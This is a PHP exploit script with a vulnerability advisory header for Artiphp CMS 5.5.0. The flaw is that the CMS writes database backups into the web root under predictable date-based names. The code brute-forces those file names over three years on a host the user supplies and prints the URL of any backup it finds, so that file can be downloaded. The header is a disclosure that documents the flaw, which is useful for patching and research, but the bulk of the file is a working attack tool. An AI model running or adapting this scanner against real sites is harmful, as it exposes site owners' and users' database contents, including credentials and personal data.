&lt;?php

/*

Artiphp CMS 5.5.0 Database Backup Disclosure Exploit


Vendor: Artiphp
Product web page: http://www.artiphp.com
Affected version: 5.5.0 Neo (r422)

Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.

Desc: Artiphp stores database backups using backupDB() utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in &#039;/artzone/artpublic/database/&#039;
directory as &#039;db_backup_[type].[yyyy-mm-dd].sql.gz&#039; filename.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8 / 5.3.9
           MySQL 5.5.20


Vulnerability discovered by Gjoko &#039;LiquidWorm&#039; Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php


15.05.2012

*/

error_reporting(0);

print &quot;\no==========================================================o\n&quot;;
print &quot;|                                                          |&quot;;
print &quot;\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n&quot;;
print &quot;|                                                          |\n&quot;;
print &quot;|\t\t\tby LiquidWorm                      |\n&quot;;
print &quot;|                                                          |&quot;;
print &quot;\no==========================================================o\n&quot;;

if ($argc &lt; 3)
{
    print &quot;\n\n\x20[*] Usage: php $argv[0] &lt;host&gt; &lt;port&gt;\n\n\n&quot;;
    die();
}

$godina_array = array(&#039;2012&#039;,&#039;2011&#039;,&#039;2010&#039;);

$mesec_array = array(&#039;12&#039;,&#039;11&#039;,&#039;10&#039;,&#039;09&#039;,
		     &#039;08&#039;,&#039;07&#039;,&#039;06&#039;,&#039;05&#039;,
		     &#039;04&#039;,&#039;03&#039;,&#039;02&#039;,&#039;01&#039;);

$dn_array = array(&#039;31&#039;,&#039;30&#039;,&#039;29&#039;,&#039;28&#039;,&#039;27&#039;,&#039;26&#039;,
		  &#039;25&#039;,&#039;24&#039;,&#039;23&#039;,&#039;22&#039;,&#039;21&#039;,&#039;20&#039;,
		  &#039;19&#039;,&#039;18&#039;,&#039;17&#039;,&#039;16&#039;,&#039;15&#039;,&#039;14&#039;,
		  &#039;13&#039;,&#039;12&#039;,&#039;11&#039;,&#039;10&#039;,&#039;09&#039;,&#039;08&#039;,
		  &#039;07&#039;,&#039;06&#039;,&#039;05&#039;,&#039;04&#039;,&#039;03&#039;,&#039;02&#039;,
		  &#039;01&#039;);

$backup_array = array(&#039;full&#039;,&#039;structure&#039;,&#039;partial&#039;);

$host = $argv[1];
$port = intval($argv[2]);
$path = &quot;/artiphp/artzone/artpublic/database/&quot;; // change per need.

$alert1 = &quot;\033[0;31m&quot;;
$alert2 = &quot;\033[0;37m&quot;;

foreach($godina_array as $godina)
{
	print &quot;\n\n\x20[*] Checking year: &quot;.$godina.&quot;\n\n Scanning: &quot;;
	sleep(2);
	foreach($mesec_array as $mesec)
	{
		foreach($dn_array as $dn)
		{
			print &quot;~&quot;;
			foreach($backup_array as $backup)
			{
				if(file_get_contents(&quot;http://&quot;.$host.&quot;:&quot;.$port.$path.&quot;db_backup_&quot;.$backup.&quot;.&quot;.$godina.&quot;-&quot;.$mesec.&quot;-&quot;.$dn.&quot;.sql.gz&quot;))
				{
					print &quot;\n\n\x20[!] DB backup file discovered!\n\n&quot;;
					echo $alert1;
					print &quot;\x20==&gt;\x20&quot;;
					echo $alert2;
					die(&quot;http://&quot;.$host.&quot;:&quot;.$port.$path.&quot;db_backup_&quot;.$backup.&quot;.&quot;.$godina.&quot;-&quot;.$mesec.&quot;-&quot;.$dn.&quot;.sql.gz\n&quot;);
				}
			}
		}
	}
}

print &quot;\n\n\x20[*] Zero findings.\n\n\n&quot;

?&gt;
